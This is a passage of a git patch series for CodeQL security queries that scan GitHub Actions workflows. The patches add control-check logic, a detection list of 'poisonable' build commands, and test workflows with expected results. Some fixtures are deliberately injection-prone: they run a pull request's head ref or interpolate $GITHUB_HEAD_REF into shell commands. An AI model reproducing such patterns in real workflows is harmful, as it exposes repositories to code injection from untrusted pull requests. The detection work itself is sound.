toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | From a368b797fd1c2f6e9e1e8ab1b2978570267eb584 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:39:22 +0200 Subject: [PATCH 0385/1267] fix(checks): Add repository control checks --- .../codeql/actions/security/ControlChecks.qll | 20 +++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index ec7e0ad0598..90a989c1a16 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -77,7 +77,6 @@ abstract class PermissionCheck extends ControlCheck { override boolean protectsAgainstRefMutationAttacks() { result = true } } - abstract class LabelCheck extends ControlCheck { // does it protect injection attacks but not pwn requests? // pwn requests are susceptible to checkout of mutable code @@ -108,7 +107,6 @@ class EnvironmentCheck extends ControlCheck instanceof Environment { } /* Specific implementations of control checks */ - class LabelIfCheck extends LabelCheck instanceof If { LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') @@ -143,7 +141,14 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) - .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.full_name\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.owner\\.name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) ) } } @@ -174,6 +179,13 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { this.getCallee() = "lannonbr/repo-permission-check-action" and - not this.getArgument("permission") = ["write", "admin"] + this.getArgument("permission") = ["write", "admin"] + or + this.getCallee() = "xt0rted/slash-command-action" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("permission-level") = ["write", "admin"] + ) } } From 59fd8530a33c914334f488b641458131b10ff6cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:39:58 +0200 Subject: [PATCH 0386/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dd99208f5e3..554ef6bbe7f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.14 +version: 0.1.15 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fe02dad9c55..e72b14fb358 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.14 +version: 0.1.15 groups: [actions, queries] suites: codeql-suites extractor: javascript From 8231261ccfa8bd02c43567d51739258de74af09c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 9 Jul 2024 17:28:04 +0200 Subject: [PATCH 0387/1267] New poisonable steps --- .../actions/security/PoisonableSteps.qll | 8 +- ql/lib/ext/config/poisonable_steps.yml | 54 +-- .../.github/workflows/poisonable_steps.yml | 11 + .../library-tests/poisonable_steps.expected | 12 +- ql/test/library-tests/test.expected | 307 +++++++++++++----- 5 files changed, 283 insertions(+), 109 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index e22662c64db..34246fa4e8f 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,12 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getScript().splitAt("\n").trim().regexpFind("(^|\\b|\\s+)" + regexp, _, _)) + exists( + this.getScript() + .splitAt("\n") + .trim() + .regexpFind("(^|\\b|\\s+)" + regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)", _, _) + ) ) } } @@ -41,7 +46,6 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", group) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 56ba567aa45..f9274f54872 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -2,7 +2,6 @@ extensions: - addsTo: pack: github/actions-all extensible: poisonableActionsDataModel - # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 # source: https://boostsecurityio.github.io/lotp/ data: - ["pre-commit/action"] @@ -14,40 +13,46 @@ extensions: - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel - # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 # source: https://boostsecurityio.github.io/lotp/ data: - - ["ant "] - - ["bundle "] - - ["cargo "] - - ["checkov "] - - ["eslint "] - - ["go generate"] - - ["go run"] - - ["gomplate "] - - ["gradle "] - - ["java -jar"] - - ["make "] + - ["ant"] + - ["awk\\s+-f"] + - ["bundle"] + - ["cargo"] + - ["checkov"] + - ["eslint"] + - ["gcloud\\s+builds submit"] + - ["golangci-lint"] + - ["gomplate"] + - ["goreleaser"] + - ["gradle"] + - ["java\\s+-jar"] + - ["make"] + - ["mdformat"] - ["mkdocs"] - ["msbuild"] - ["mvn"] - ["mypy"] - - ["npm [a-z]"] - - ["pnpm [a-z]"] + - ["(p)?npm\\s+[a-z]"] - ["pre-commit"] - ["prettier"] - - ["pip install -r"] - - ["pip install --requirement"] + - ["phpstan"] + - ["pip\\s+install\\s+-r"] + - ["pip\\s+install\\s+--requirement"] - ["poetry"] - ["pylint"] - ["pytest"] - - ["rake "] - - ["rails db:create"] - - ["rails assets:precompile"] - - ["rubocop "] - - ["terraform "] + - ["rake"] + - ["rails\\s+db:create"] + - ["rails\\s+assets:precompile"] + - ["rubocop"] + - ["sed\\s+-e"] + - ["sed\\s+-f"] + - ["stylelint"] + - ["terraform"] - ["tflint"] - - ["yarn "] + - ["yarn"] + - ["webpack"] - addsTo: pack: github/actions-all extensible: poisonableLocalScriptsDataModel @@ -59,5 +64,6 @@ extensions: - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - ["(python)\\s+(.*)\\.py", 3] - ["(ruby)\\s+(.*)\\.rb", 3] - - ["(go)\\s+(.*)\\.go", 3] + - ["(go)\\s+(generate|run)\\s+(.*)\\.go", 4] + - ["(dotnet)\\s+(.*)\\.csproj", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 7be32ca5c17..37ec9c9ff71 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -27,3 +27,14 @@ jobs: - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: xvfb-run ./mvnw clean package + - run: echo "foo" && npm i && echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo `npm i` bar" + - run: dotnet test foo/Tests.csproj -c Release + - run: go run foo.go + - run: sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # not supported yet + - run: sed -f ./config.sed file.txt > foo.txt + - run: sed -f config file.txt > foo.txt + - run: echo "foo" | awk -f ./config.awk > foo.txt + - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index dc6b863d0b9..55105c39bdf 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -17,4 +17,14 @@ | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c80dc006ce7..08f9136f2e5 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -63,7 +63,18 @@ steps | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -109,7 +120,18 @@ runSteps | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -191,7 +213,18 @@ runStepChildren | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -344,94 +377,138 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| 